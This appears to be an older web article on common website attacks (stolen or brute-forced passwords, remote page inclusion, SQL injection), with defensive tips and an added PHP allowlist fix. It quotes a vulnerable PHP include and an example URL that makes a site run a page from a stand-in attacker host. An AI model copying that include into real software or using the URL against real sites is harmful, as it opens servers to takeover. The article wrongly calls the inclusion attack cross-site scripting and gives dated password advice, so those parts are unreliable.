Here are the most common techniques used to hack a website

Hacking sites that are least protected by password – Bypassing authentication

It’s the webmaster’s nightmare: hackers accessing the site using stolen passwords that should have been kept under control. Usually the hackers are people well known to the webmaster. They use various techniques to steal the password: they access the webmaster’s email, or they use key loggers or network sniffers to capture the passwords the webmaster uses in day-to-day work.

Hackers can also use techniques such as brute-force attacks (dictionary attacks) to find weak passwords. The more complex the password, the more difficult it is for hackers to find it with this method.

How to defend

* It’s advised to make passwords out of capital letters, small letters, numbers and symbols, and they should be at least 6-10 characters long.
* Change the passwords at frequent intervals
* Don’t store the passwords in email
* Use the latest antivirus software to make sure that the system is free of key loggers

XSS or the cross site scripting

In this method the hacker again gains access to your website, this time using a previously disclosed or undisclosed security vulnerability in the server software or the scripting language. Hackers try to execute code hosted on a remote computer and so gain access to the secure areas of the website.

For example, in Apache/PHP, if you include a page like this:

include $_GET['page'];

and use the GET request to include aboutus.php like this: http://yoursite.com/?page=aboutus, then hackers can execute a remotely hosted page like this: http://yoursite.com/?page=http://hackerssite.com/directorylist.php

This method is the simplest, and there are many variations of it, such as intercepting JavaScript to execute XSS attacks. Nowadays it is very common, as webmasters move towards Web 2.0 techniques and use loosely coded AJAX.

Read more at http://en.wikipedia.org/wiki/Cross-site_scripting

How to defend

* Be aware of the XSS attacks happening around
* Update the web server software and server scripting language
* Disable unwanted services in the server software
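
As an added example (not code from the original page), here is one way to close the hole in the include of $_GET[page] shown above, a pattern usually classified as remote file inclusion: look the requested name up in a fixed allowlist and never pass the raw parameter to include. The page names, the pages/ directory and the resolve_page helper are assumptions made for illustration.

```php
<?php
// Added example, not from the original page. Page names, the pages/
// directory and resolve_page() are hypothetical.

// Allowlist: the only values of ?page= the site will serve, mapped to
// files that live in one fixed directory on this server.
const PAGES = [
    'home'    => 'home.php',
    'aboutus' => 'aboutus.php',
    'contact' => 'contact.php',
];

/**
 * Resolve a requested page name to a local file path, or return null
 * when the request is not on the allowlist.
 */
function resolve_page($requested, string $baseDir): ?string
{
    // Reject arrays (?page[]=x) and anything else that is not a string.
    if (!is_string($requested)) {
        return null;
    }
    // Exact key lookup: a URL, a path or an unknown name all miss here,
    // so user input never becomes part of the included file name.
    if (!array_key_exists($requested, PAGES)) {
        return null;
    }
    return rtrim($baseDir, '/') . '/' . PAGES[$requested];
}

// Constructed sample inputs, including the remote URL from the text above.
$samples = [
    'aboutus',
    'http://hackerssite.com/directorylist.php',
    'no-such-page',
    ['aboutus'],
];

foreach ($samples as $input) {
    $path  = resolve_page($input, __DIR__ . '/pages');
    $label = json_encode($input, JSON_UNESCAPED_SLASHES);
    printf("%-45s => %s\n", $label, $path ?? 'rejected (send 404)');
}

// In the front controller the result would be used like this:
//   $path = resolve_page($_GET['page'] ?? 'home', __DIR__ . '/pages');
//   if ($path === null) { http_response_code(404); exit; }
//   include $path;
```

Keeping allow_url_include switched off in php.ini (its default) additionally stops include from fetching a remote URL at all.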

SQL injection

In this type of attack, hackers take advantage of the compromised database. Hackers inject carefully written SQL code through the forms available on the website (registration, feedback forms, etc.). Read more about this type of attack here:

http://www.unixwiz.net/techtips/sql-injection.html

http://en.wikipedia.org/wiki/SQL_injection

Ways to protect

* Clean up the inputs before inserting to the database
* Properly escape input strings
